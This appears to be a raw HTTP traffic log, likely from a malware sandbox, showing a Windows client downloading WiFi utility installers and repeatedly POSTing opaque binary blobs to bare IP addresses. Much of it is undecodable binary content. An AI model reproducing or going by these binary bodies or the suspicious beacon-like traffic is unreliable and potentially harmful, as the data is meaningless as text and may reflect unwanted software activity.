...Q.`....2.yS..TC..b..{......q9..C..!o.k..........1......!.'G.}.D._..
NG.~..]..".....>....l.. ..-....Jv.S....G.}.............1.F.......4E
e.......\U.Y....nS.Ym.S!....p.8.su...7.Z..wv1...fm.s..~.S.A,zM.!.W&...
.....^4......{1..L;.....~3.`KJ.3....\x..pn.--f...:.........i,%>8X.O
....].D..V..48..n..P.6J.9.:.........aw~K2.iaF..<!....S.9.r.T...[...
..4r*.|..B.?...3.h.&.P.XK... ....F '.y(....o..[&..E...._.m...f..?.[.eZ
u.N....y.t......x.-.' .. .c.s........Q..U..u}...I........OR...f:.JF...
V,[email protected].. ."[..m.....u.V\T...s.K....v.U...o$yV..ML....|.
.JM......&.....?-...'.......q.......Z....836]..x7.....E.#4.....W....p.
zu.Y....9 ..<....O..o...;4...}Bl. ......c...i......U.D.T.LSt..gn...
..0 PM.z.N..3.".i.......\=..s>...j..Q,8.y.....&....A....k.T[..^....
.n.(.....H.g.UGO@.;..8..5...Ob. 0.73&`.]..r..U.r...3.....o.R...{......
aZC?O.....6.:B....9..N.......$g...X.x^2m.\f..@^...EO._.V.L.|P;.Y...eT.
c..5..4...R. sctoec....X......Ie.{.7.........$......2,...v.O.W.9Ps(4X.
...Rb...........1..i...IY...D$.1b....yR...e....qa8.~..W......*_.F.....
..r.Nz.g...t.j..6(.=.P.z..."m_............a..p.). ...,.3..}.U...M.W.X.
......V a.wI......Ck.,?.....}D]zi.`[email protected]..)...M.
..4...,...Cc..%...S....x?..oD?.e..S.vOX..G..C)......./...O1..Vg._~.Jv.
6...)_.-/N.[...jT..J....Vlo\..\.W...r5...pb..|>..._.n.)..9.....
<<< skipped >>>


GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=2927382-5854763
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:12:56 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



GET /net/a/66/link?appid=66&url=http://dl.app.sogou.com/pc_logo/zhuanti_58_640x260.jpg&r= HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRecommend
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:13 GMT
Content-Type: image/jpeg
Content-Length: 22849
Connection: keep-alive
Last-Modified: Wed, 18 May 2016 10:35:50 GMT
Expires: Thu, 19 May 2016 10:35:50 GMT
Cache-Control: max-age=86400
ETag: ba3617d88686c674c13033d96307ba4d
X-YunTu-Cache: HIT
X-Yuntu-Trace: yf_26_53
X-Yuntu-Trace-Proxy: tc_212_43
......JFIF..............Exif..II*................zhXXp://ns.adobe.com/
xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> &
lt;x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014
 79.151481, 2013/03/13-12:09:15        "> <rdf:RDF xmlns:rdf="ht
tp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf
:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="h
ttp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.ad
obe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:f1af487c-5480-d949
-88eb-cc294c54a04e" xmpMM:DocumentID="xmp.did:40C9C4E8A94411E5A05499F2
C1441D57" xmpMM:InstanceID="xmp.iid:40C9C4E7A94411E5A05499F2C1441D57" 
xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFr
om stRef:instanceID="xmp.iid:edd6ef7c-c0da-c845-9dde-1c96745be157" stR
ef:documentID="xmp.did:f1af487c-5480-d949-88eb-cc294c54a04e"/> <
/rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket 
end="r"?>...C......................................................
..............C.......................................................
..................@..".........................................._.....
........................!.1A.."Qa.2q..#3B.Rbr...$8c...%'(CWw.........)
4TUVduvx............................................C.................
.........!1.AQ."aq.2.....BRbr...#3....7..STs................?....>.
...>.F?..<}q.e..........~..................H.|1.1...HL....X0rO.?
.0....T.$.R..`..D.....u ...........KO(.......99......w.,6.?......V
<<< skipped >>>


GET /pc_logo/7638937123950702413.png HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dl.app.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.0 503 Service Unavailable
Server: Cdn Cache Server V2.0
Date: Thu, 19 May 2016 07:13:50 GMT
Content-Type: text/html
Content-Length: 1604
Expires: Thu, 19 May 2016 07:13:50 GMT
X-Cache-Error: ERR_CANNOT_FORWARD 11
Via: 1.0 db79:82 (Cdn Cache Server V2.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "htt
p://VVV.w3.org/TR/html4/loose.dtd">.<HTML><HEAD>.<ME
TA HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=gb2312"> .
<TITLE>......................URL..........</TITLE>.<STY
LE type="text/css"><!--BODY{background-color:#ffffff;font-family
:verdana,sans-serif}PRE{font-family:sans-serif}--></STYLE>.&l
t;/HEAD><BODY>.<H1>....</H1>.<H2>..........
......URL..........</H2>.<HR noshade size="1px">.<P>
.......................URL.......<A HREF="hXXp://dl.app.sogou.com/p
c_logo/7638937123950702413.png">hXXp://dl.app.sogou.com/pc_logo/763
8937123950702413.png</A>.<P>....................<UL>
.<LI>.<STRONG>.Unable to forward this request at this time
..<BR>................................</STRONG>.</UL>
;..<P>.This request could not be forwarded to the origin server 
or to any.parent caches.  The most likely cause for this error is that
:.<UL>.<LI>The cache administrator does not allow this cac
he to make .    direct connections to origin servers, and.<LI>Al
l configured parent caches are currently unreachable..</UL>.<
/P>.<P>......................................................
..................................<UL>.<LI>...............
............................................<LI>................
.................................</UL>.</P>.<P>.
<<< skipped >>>


POST / HTTP/1.1
Host: 123.129.242.139:80
Content-type: application/octet-stream
Content-Length: 2668
Connection: Keep-Alive

<.......
...&j...9.......A.r..I.P.j(....#O&.
R.D.rS..4..n.'..?9....YMMJ.o.W..'"..)..LQ.....A.....r.
.Z....v..I.....iEH...X=. ...d}.......[...8...OM....6Z.O*$ewX..R
...a...N(F1..#3.......~b..g....,...:...'..\4.).j...m.#M...CP..)..a..u%..~[.......Rmk.N.ytZp......4...L....;..Jh8..]!UC...N..D....l..(Z..(..!.?.[...m.#M...CP..)[email protected]....;..Jh8..]!UC...N..D....l.N....z...y.....vQ..D..r...$.rp&hJTS.F....|... a........@../...:..=.kS.WLo...{..F.......BydLk.."...B...^.o..OnHr...*.3For..k....O.(M........r.(m#..'.#....h
5...49|......{....m..I......&..,.-.y.n.Z...0.H.....A..0$V...F.|T.;..U...........l.....x3.NR.XV...i,.bF...0.......Z"......Z]d.1....~...7.Si=........n........h..Tpz.!0'|,.3EW... C....'..l....6G.&..w..J..N..tF.g...g...D......"... ...6.....S.....=..].EO.L.O....*..#.O..>.K..E"$K..qS4^.p....f...r.l..y.a...N./.....m... .....1.G......#.....3D?zl
.W_Z.,...[......Nc.B.....DR........kQZ.S^......9...,.m...._7s=W.U........H.73.....E../...O..7...Y.....W.........%.....W..<.3}l.!(u.t..O..r...7.n..^.F.#..;....O....JGd.:.f.W8.n..f..w;. .......O..f.-..X-q.i...V=..>..*.v.....:.o'..VI_.....-..}o"j.B..>G....s25OU..P..;....#ASvH....~.H.C..i..;r...2...V.sG(..[V..d.......7......%....._... ..).f..j...O../.v..NHY..f*.1DG...tJ/.0E..G..(o.N..o.*.....^.Ja..I......&..,.-.y..`...^........1.........ts.......]6.d"."W"........x.s......&......5d..y.a..XO.N.
HTTP/1.1 200 OK
Content-Length: 28
Content-Type: application/octet-stream
Connection: Close
HTTP/1.1 200 OK..Content-Length: 28..Content-Type: application/octet-s
tream..Connection: Close..<............`..B.....{O.B....



GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=1766682-3168363
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:31 GMT
Content-Type: application/octet-stream
Content-Length: 1401682
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 1766682-3168363/11709528
...-L$OS.r.... :.D#.5....5.u.Y4..%a.!..w..*-.>X.N>.'.z......\..S
....{.....%........DT.l..=.*.mo..4....Ao....H.A.:...;_..gFB....0.... %
%#....`.&;...H.x>.`oJM.0.....8&m..L1..r%,.2....O....i......=.Y.D .Q
._.WqYP.R.|.h.Y....$.l'......g..Y{.7.d.../r.2.{........=.].O..........
..j.].%Y.{a...p......h......Z.......LK8...........}BiI..... c........T
...:.p.x......p..../t,...]>KM...3B ...{t.....15:...3v28....zQ /..Ep
....%..$k........5..V...9.M..........L.w.b.b..5.t.Y.-..I...t ..Q:f.?.D
.2...A.<...<..r...2hD.x~6).$.e........OW....).i..QD...B...Q.j@.&
lt;f..`...0.h.:...V.6.7y...........p..&.......5.t.K...%}[email protected]~
....$yo.uk-r......#...._.*G..q...{J..0.t.......&..gS.H.9.(.~..-..n..A.
.......V.92........T......~...x...[.8C..P......3..70.[.5..}#.....9.."O
.).......t.Bl.....4Z'...&.D...8l.Bd.h............._.R..)9.D.w..%...0].
{...B)..............# ......V..U......!I....?...fe~..i~.....6?...r..#.
~9.U.~.3b)....34.......`.]........T#.8.....1.#.]u^Qm.1.. .U..1....:...
6..............5.<.c.....1.......Qg.Foeg.F.nf....v.f.g....l.xr..q.h
....,..=..1.....3..#...3E..k.<.#.`.t....e......FV.t[.:u.... ....Tb}
i..X...e7w.3.X.o.1...... ..y.RXO..|.g.-9......V..."w...\.....k.|..h.`)
.P.S.hS#..w...B.vU.`.r.%..U6#..;Z..k0l.I#u...<......q.6.,..........
'%.'..w.~r.FD.m..o...j...k< ......a........A..W....b...S...<....
..C....ac.[.\mX.[.%.t'8..g...uS...f:r..l<..#}7\..q...  ."..y.Z...,]
K{..]I.h.^....|..I....A.Z...}..m.5..<..<[.......n.NK{...{$-g6..k
H..t4.r.xq.. vQo.&-.cEF..R .s...P...../.c....h.F.u.T~..q ~..s.vo..
<<< skipped >>>


GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: close
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=8701288-
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:44 GMT
Content-Type: application/octet-stream
Content-Length: 3008240
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 8701288-11709527/11709528
.0.CP..M.J...........f\k..r_}..#..D..]/...R....~.6..a.6..)F1.#....H...
.......{R...1.33...dS`..("..q5>'J.....$8...."....#..L5.......Y..>
;#k~t.6lM8|d.....Y..{..c..d.w............C.P.....P....-4...>......K
..r...i.J....7.K...N.ok.U..I...-'.I.F...i.....#.....^[email protected]/S....T.L
.......4]...uU/..K7...3....4..u[..B...7.,......x......f..5:.........Sl
.....].qY8....<s..B.v.y.... U...].o.s..{..S...g/...3..b....k....V%.
#.6Z.ZI......I.....}.p.9...y."Yl...j)@....5...y...>`..[.^.Z.P...P.:
..Z..(.6=..w?...7...9.H/(./q....$3..SR..`.. .L.]<.=.T ...;x.xg.$..;
LP...%.....L......{]E;....e..T.*i..'UXP7;.>..JW.{...;...........r..
Ujfb9...\.]6....p [email protected]...}.._c...I....;w8..o.......le2..
v.Q..y.HT..{.h}.3...?>.{x?. K.:.(A......`..yH..>.}lC.....)s.....
..d...C...j,..e.r..d.}......s.G....C.3.9c....[E.I;l../.../..F(...3.2.J
Bu.......pX......`.j...".ml..~\....4....9q...4........2E..2[....h_.!.A
.1..}]n....3.T....fn..j.4..aU.ej..|.......z...B....6tf.......-L..O....
@..fST....p.W.Y.%......].D.O..ZG...............k...2..?(........`nI."p
[email protected].}"[g..Z.Q..o.2..%}.S.3.~3}.n.....g'{&.......r$
*....]`..%..b..z.o...;g.W.t.!..,.s....h....6....l,n..xv.8.M.yJ.Oi<!
X....>>.`....).....T....M.Z..R..Ez.........g.....E..{......S..;.
@...~............f......F..&F.c4H:.i/.$.)..e.P......q4>%....y..V$O.
..... X....P.v... 4....h"....B....{.\sm.r.K`S,....lz.'}.U.T.c.[T..j[&*
:1M.>x.$*..\.6C.............KoL..?...!..x.n.I..Y..'B.<...^.n,.E]
..T....n.=.fV.....E.........."...^.mJn......Ri......n<..a.....A
<<< skipped >>>


GET /v2/thumb/retype/ext/auto/cls/imagick?appid=200504&url=hXXp://www1.pconline.com.cn/download/zt/2013/ico/pc4848.jpg HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:12:46 GMT
Content-Type: image/jpeg
Content-Length: 3008
Connection: keep-alive
Last-Modified: Thu, 19 May 2016 07:12:45 GMT
Expires: Fri, 20 May 2016 07:12:45 GMT
Cache-Control: max-age=86400
ETag: 26af685efd16b705eda32b3ecb87e163
X-YunTu-Cache: HIT
X-Yuntu-Trace: bjzw_48_60
X-Yuntu-Trace-Proxy: yf_29_21
......JFIF.....d.d......Ducky.......d......Adobe.d....................
......................................................................
.......................................................0.0............
......................................................................
...........!....1A".q.2#.QBr3........................!..1A..Qaq...".B.
....2b....R.3.$............?....j{X.g.........~...G.m...bM..l...#fM...
E.T......abh..7.....q.Uj..S.*.E2GQ..@.%.2..O!.c..(.P..:.......z}.Z....
LU...SL....);..a.{I..5.....T2...a\.9..]............Q.O"5!.o.q.0...o...
.5.z.'u....~.;...../.z|}....^...F..MR...A..8...Z5.h.Zpv.q...^.H\..`{..
.GP...d..<q....a..lWm.6..d.....~.e.......Z.$.)(xwl...."'(...EB....b
.m.l.kk.. .4du*.H.UM.. ....[{.{....D.....C P.h....2...#.8{...&/..."P..
.`.n..f.fA ..2...>c....T....fc.1...lA"[email protected].~M
S...O.....K=...`.o........7.T...qz~.O`/..|?...kj-........x..S....M0...
x: ..'.......~..Dm..h..j..q:...M..1.`K"l....b..q...:...&9..iU..q....n.
 .T.~...uu"...o'..4...[.p.6.NU."k....$.............X........P.R..4....
..p..B...rHm..ac.|.p5W0.8s.)........y......L.u.?c,....>.'..r..u1...
..{....j)Z.[w..hA. ...%....c.....&..&..w...`"H .`'QU.;..o.D.D6....T..f
f4..d.r.s......d..W..F....f9...I..E....^.........nE..~....DT.b..M.j.U.
Cu!..(..../_..!.c.n...i&...2...4..I.b<.....v.R. .k..v.._j%.........
P9...b....._q...-...p.W..M:.n.2..zx.R~V...rY.. ...h.e."..3.6.....w7...
..../m.F........6....8...`i.V..c.....ne.e.Be'[email protected]..~8.U.Uv...g......
@..I1T...g.....Id..N...C....4.edb..phA.0S..Q...N...OeI.uz....!...d
<<< skipped >>>

HEAD /v2/thumb/retype/ext/auto/cls/imagick?appid=200504&url=hXXp://www1.pconline.com.cn/download/zt/2013/ico/pc4848.jpg HTTP/1.1


Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; {D9D54F49-E51C-445e-92F2-1EE3C2313240})
Host: imgstore.cdn.sogou.com
Content-Length: 0
Cache-Control: no-cache
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:01 GMT
Content-Type: image/jpeg
Content-Length: 3008
Connection: keep-alive
Last-Modified: Thu, 19 May 2016 07:12:45 GMT
Expires: Fri, 20 May 2016 07:12:45 GMT
Cache-Control: max-age=86400
ETag: 26af685efd16b705eda32b3ecb87e163
X-YunTu-Cache: HIT
X-Yuntu-Trace: bjzw_48_60
X-Yuntu-Trace-Proxy: yf_29_21



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=2927382-5854763
Referer: hXXp://112.5.251.213/pub/download/201010
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:12:57 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



POST / HTTP/1.1
Host: 123.129.242.179:80
Content-type: application/octet-stream
Content-Length: 588
Connection: Keep-Alive

<.......@....~..XX.-.._~.....K.....523.^^j.$..G.aj.z..T......_Xw./.r..s..Pj......k..c.....F..N.}d..S.[..T.k.yO....:K.....]]I.9.T...6o..{vh'...>..!k..d-..H......4J..0..5Jj_..G....3....}r.....*..._lV.&q`{&..|...2#.5....5!..Ke....
a.....F._>p...*..c.2.......]..s..1_.(s;...qPo5-x=X{.V/-..b.....OV[x.-.z.\....7....Lj....\....7....Lj....\....7....Lj....\....7....Lj...o...$.. ..%..L...V.h.tU.5z....%.\....7....Lj...]..V$&. .Ll..._..XJ..$ a.z.G,.I..E........OII.....:.?...............i=c.y.jM.:O.x.s8.{...!?{ .,......".X.FG.X...\....7....Lj....\....7....Lj.......UwG#.M)w`.6..|.12.z.:.U....f
HTTP/1.1 200 OK
Content-Length: 28
Content-Type: application/octet-stream
Connection: Close
HTTP/1.1 200 OK..Content-Length: 28..Content-Type: application/octet-s
tream..Connection: Close..<...........'..A[.|.*....(......


POST / HTTP/1.1


Host: 123.129.242.179:80
Content-type: application/octet-stream
Content-Length: 396
Connection: Keep-Alive

<............_e..7[.s).(....t?......m`][.....Q..o.........~}...F...Z.W.E.7U..a...".R..U,Pc.f.8#U~..Z...e!..T%.c."_.~...>.Gz....:.....
n^N....U......z.ai....Y#7.......l....'.i.d..._.KX`...~.lm;.?6<....<g...m...O.i........!...RjC.q...o...P........G]... ........eW%.I.J.....?..cRE..Y...6V3....6...fzb.g=l.rtO..`~.Cr.......(.OM:.cE.Ndk.]...u......)B.b.a.,....V.v......7C..b.......*.......i..,....
HTTP/1.1 200 OK
Content-Length: 28
Content-Type: application/octet-stream
Connection: Close
HTTP/1.1 200 OK..Content-Length: 28..Content-Type: application/octet-s
tream..Connection: Close..<.............7.o...?..ea.....



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=5854764-8782145
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:21 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: close
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=11545688-
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:43 GMT
Content-Type: application/octet-stream
Content-Length: 163840
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 11545688-11709527/11709528
<./.jE..y.LS...VWV..V..........az..*[email protected].$.GXX..I...6.......4C.
..C.gZ..T......#H/..E.{."]r..h....G^..x|...O?....K fnE..Zp.#t"u..x...o
......?1.^k..^&L.N...T.#[email protected]...;9...OZ...^=..P..7..<..E.C.
=..8...wW1C........F=.B.....L.J..t'..a..FC.Z?....d..Q......4(<[email protected]?
....H.o....~_s.sB...}&....M!..u.....g...oT..E...rE_&A.........O..G%9.@
a.......v%.}.z=......i.6...r/.SG._x....lJ)...u.A...U)?5].pv*..'.Y....t
/qn.,.Cw.L.o."...a.................ys/.Rj..^h1.2.B.c(......OA.u.. >
........(T...d.."[email protected]...\..K....T.X..'.9...K._0..b....h.M.....v
.G....." ...A...y.U.....|.C..`INL......F..@...".lqt..I..........X. ..u
?6.. .e...2;g...d-.uL.{..!...7}....E.5...>.<X.l.`1^..}..l:q..9S 
..5.......|. ..1....d........I....`ia.F...:.k*..`......R...."k......o.
M.N.87.....c..\.....u j)..G.7s<..B....,[email protected]...|..._..zk.Q.HH
......x..8..........|..9.....?k.VvU.j9.sx..l....HH|.p....-.....q.C..0.
T5].<U..M&..Rx*.o..-W&.V=:w9......c.gm...n../.'..y.....-...,...j^.e
..../R......|.1D..,......,..tx[..D..x.N ...`/.Z.w........,.p.Ls.V0....
...wh.;....Wpcw.Y....%.~.5..0.^...^.^.{.u.?..l......:.m.O'F...C..Y...W
.........._.k..R..RR..QJ}.4._#....kx.......CnMn...b.."..m.#..H...|x..M
..Zp<.E!..-As.v..BQG?.N..}....@.;Q..9......Rsm..5.\....A.y.......&g
t;B.....R.... |jo...T.`..*a..._).......6.*...&*.6W."eG...kl.4....@....
c.".. .Dd.b..8...Y..........5fS.*..sq/.V:.......<.J..&.._..q...d. z
...K........4....6.3.....H.<..Q6........W.o-z.._b`....,....MH......
0...<..r....... w?..Z4......`..S.t[..P60"?.....fG....*........X
<<< skipped >>>


GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=2977793-3168363
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:14 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



POST / HTTP/1.1
Host: 123.129.242.140:80
Content-type: application/octet-stream
Content-Length: 268
Connection: Keep-Alive

=..............)/...z..J.%.G........._.V.Fqx..!L.....,
..,.5....Rv...B.jfLr.r..c
.5 3b.J...\....t[...Y.....Ow.#..Y..X....3:6.....7e..3'
...........
..Z>k\......~.-....|.i....=.3.9EX*[email protected]..........a.6 t..k.4.{..1...n...}:...%...>..jk.T...G(.............<.P.6a
HTTP/1.1 200 OK
Content-Length: 2156
Content-Type: application/octet-stream
Connection: Close
=.......`......)/...z..J.%.G........._.V.Fqx..!L.....,....,...<M.~.
@..c}.8.CfV.Q.>..u......rz..4..a...R....../I.y}.W]...Z{M.od.F.e,&l.
x4...g....m.... 14w.q..t..&...z.4......#.:b}. .....@......<..".....
.7.K.......G....i...........|R. sCq..5........D..6.&...cV.U..-.hb.....
^Po.........4.]$5E.g.s;..Y..h./Vrr...B$f.GS ..G.V......ba....4:.BhT<
;F|..3.}F...."s.CO....$ylde.T..>......,..-.`U.2.I.V..-.v.c ....^.mm
XGc.#*..d....v|..uws..]..F..Ef...s..Nd^..m..0..pYTMP..E......=..#.fi0H
.~`6...u...D.vA?.Q...j..|.O,...P.FW....X..,..<._)E....2`..h.H......
[[email protected]{..v,...ZBxpCB|.c..K.|...w.)`...........iZ.[......&......9
D..Z.*..r&....m..D5 <..C.7..6.wp.(.2..c..j..........2y........... g
..*...\.>.]4;.`1lc..v|...XV....f..#......[T.....[.Dq...X^......-...
l..F.O...s.(.D...Q%?.82......4...)Mdy..*..fh.....([...DO.Rc..~..x.VS)`
.m..up:$.l)y.<x....Q.=..O..1...........Na......j:......G.X.>.l..
I;b...d..:q.R.0.S...:..B. Cb.7.i......8......S.d.;E..^.....;....2.....
...X._.I.=m1=KMe.1xJ... ..........{....$.....!........t....ty...)..6..
M&q.~p...pV.Hb;..cE...gr_h....I......p(l1.B. ..wBElI&T......8.W.&.8..S
Ql.....~6..2....DN..u.a.6....m._... .H.......D......"..2.pH.=...4.:..u
.....D.,|..:.6D.........U.|<[email protected]....$.7..S..l-...
6.........rg.y.q....2N.8..e...1g............/;T..............H:.<..
..z.6....~.Z...nm..q.a$....)P>,...P=8........'....j...........LM...
..}|....$:....u./.?......c.24..<{q/p..r.V....v....m.LR.#.!.l..$...g
R$f/J............%.`.wt..{.....".m:}..U......(.V.B....f..r.@.../.T
<<< skipped >>>

POST / HTTP/1.1


Host: 123.129.242.140:80
Content-type: application/octet-stream
Content-Length: 124
Connection: Keep-Alive

=.......p....p.......8[.D.%.H.6.xI...(6.Iy...D....s2.....$..........t........%H...T....x...'.x......[.....}
..............m5
HTTP/1.1 200 OK
Content-Length: 92
Content-Type: application/octet-stream
Connection: Close
HTTP/1.1 200 OK..Content-Length: 92..Content-Type: application/octet-s
tream..Connection: Close..=.......P....p.......8[.D.%.H.6.xI...(6.Iy..
.D....s2.....$...W.C.............].PM..D.......5..



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=1065841-1766681
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1


